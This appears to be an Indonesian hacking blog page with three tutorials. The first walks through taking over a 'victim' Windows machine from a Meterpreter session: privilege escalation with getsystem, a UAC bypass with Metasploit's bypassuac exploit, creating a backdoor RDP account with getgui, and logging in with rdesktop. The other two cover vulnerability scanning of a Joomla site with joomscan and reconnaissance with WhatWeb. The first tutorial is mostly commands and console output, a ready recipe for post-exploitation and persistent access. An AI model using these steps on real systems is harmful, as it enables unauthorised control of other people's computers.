Sabtu, 28 Januari 2017

Cara Mengaktifkan Remote Desktop Victim Setelah Masuk Meterpreter

Pada postingan kali ini saya akan memberikan tutorial mengenai cara mendapatkan akses remote desktop victim. 'getgui' merupakan sebuah script meterpreter yang memungkinkan untuk mengaktifkan Remote Desktop dan membuat account pengguna untuk login ke dalamnya (offensive-security)
Oke, mari kita mulai.
Saya asumsikan disini kalain sudah mendapatkan sesi meterpreter dari sistem target, untuk cara mendapatkannnya kalian bisa lihat di tutorial sebelumnya mengenai Metasploit
sysinfo
Oke untuk mengaktifkan Remote Desktop Connection dari target, kita gunakan getgui untuk membuat account, perintahnya:
run getgui -u <username> -p <password>
run getgui -u <username> -p <password>

Jika muncul pesan Insufficient privileges, itu menunjukkan bahwa kita tidak diperbolehkan untuk menjalankan perintah tersebut. jadi kita harus mendapatkan hak istimewa (Administrator) dalam sistem tersebut atau sebagai root jika di Linux.
nah untuk mendapatkan hak tersebut gunakan perintah berikut ini
getsystem
getsystem failed

Apabila muncul pesan seperti berikut
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
Itu biasanya karena UAC (User Account Control System) target sedang aktif. namun jangan khawatir metasploit memiliki module exploit untuk melakukan bypass UAC.
Sebelum menggunakan module exploit tersebut kita berjalan sebagai background terlebih dahulu dari meterpreter yang sedang aktif
background
background

Lalu gunakan module exploit exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac
show options (opsional)
set session 1 (sessions yang sebelumnya di dapatkan)
use exploit/windows/local/bypassuac

Lalu jalankan exploit kembali
exploit
exploit

Nah jika berhasil, sekarang kita telah mendapatkan hak Administrator atau sebagai root dalam sistem target
getsystem succes
Coba jalankan getgui kembali untuk membuat account Remote Desktop Cennection
run getgui -u <username> -p <password>
run getgui -u <username> -p <password>

Screenshot di atas menunjukkan Account RDP telah berhasil di buat, lalu kita coba login dengan rdesktop, gunakan perintah berikut.
rdesktop -u <username> -p <password> IP <ip-addres-target>
rdesktop -u <username> -p <password> IP <ip-addres-target>

Tunggu beberapa saat
Preparing your desktop

Nah setelah berhasil login sekarng kita dapt mengoperasikan komputer target dengan mouse dan keyboard kita sendiri.
Login Success

System properties target
System Properties

Nah jika kalian masih bingung, kalian dapat melihat video di bawah ini

Mencari Celah Vulnerability CMS Joomla dengan Joomscan

Melanjutkan postingan sebelumnya tentang Information Gathering dengan WhatWeb. dari hasil information gathering tersebut kita mendapatkan informasi bahwa website tersebut menggunakan cms joomla, nah disini kita akan mencoba melihat terdapat atau tidaknya vulnerability yang ada pada website tersebut dengan salah satu tools yang ada di kali linux yaitu joomscan.

Untuk membuka dan melihat opsi yang ada pada joomscan, ketikkan pada terminal
joomscan


Lalu kita update terlebih dahulu untuk memeriksa dan memperbarui database lokal joomscan jika versi yang lebih baru tersedia, gunakan perintah 
joomscan update


Selanjutnya untuk melakukan scanning, perintahnya cukup mudah, seperti dibawah ini
joomscan -u target.com


Dan tunggu hingga prosses selesai


Screenshot di atas menunjukkan terdapat 2 buah vulnerable dengan keterangan YES, di sana juga diberikan link mengenai exploit tersebut.


Pada screenshot selanjutnya menunjukkan keterangan NO dan N/A artinya tidak vuln atau tidak tersedia



Dari hasil scanning yang telah selesai dilakukan, joomscan menunjukkan terdapat 2 vulnerable pada website tersebut, selanjutnya silahkan di praktekkan sendiri agar lebih tau fungsi dar tools joomscan ini.

Sekian tutorial singkat mengenai Cara Pengguaan Joomscan di Kali Linux, kurang lebihnya mohon maaf.

Information Gathering dengan WhatWeb di Kali Linux

Setelah sebelumnya saya memposting tentang Information Gathering dengan theHarvester, postingan kali ini masih sama yaitu tentang information gathering, sekarang kita akan mencoba mencari informasi sebuah situs website dengan menggunkan tools WhatWeb yang ada di Kali Linux.
WhatWeb merupakan sebuah tools enumeration web information gathering yang mempunyai fungsi untuk mencari informasi-informasi DNS(Domain Name Server), lokasi server, sub-domain, versi php, jenis database, ip addres, cms yang digunakan dan lain-lain.
Dengan mengetahui semua informasi yang ada di dalam website maka akan memudahkan kita untuk menemukan titik terlemah dalam target, sehingga kita memiliki sesuatu yang dapat digunakan untuk mengambil langkah selanjutnya dalam melakukan penetration testing.

Cara menggunakan WhatWeb

Untuk melihat perintah dan opsi apa saja yang dapat digunakan, ketikkan di terminal
whatweb --help
whatweb --help

Contoh penggunaan standar, single target
whatweb targetsite.com
whatweb targetsite.com

WhatWeb juga dapat digunakan untuk menganalisa beberapa website sekaligus
whatweb targetsite1.com targetsite2.com targetsite3.com
whatweb targetsite1.com targetsite2.com targetsite3.com
Jika ingin memunculkan output dengan detail kita tambahkan opsi -v atau --verbose sebelum url target
whatweb -v targetsite.com
atau
whatweb --verbose targetsite.com
whatweb -v targetsite.com

whatweb -v targetsite.com

Dari hasil ekseskusi di atas dapat kita lihat informasi apa saja yang ada di dalam website tersebut.

Sebagai contoh kita ambil informasi dari jenis cms yang digunakan. website tersebut menggunakan cms joomla. jadi untuk mencari kelemahan dari website tersebut kita dapat gunakan joomscan, untuk penggunaan joomscan mungkin akan di bahas pada postingan selanjutnya.
Cukup itu dulu yang bisa saya share kali ini tentang Information Gathering dengan WhatWeb, semoga bermanfaat.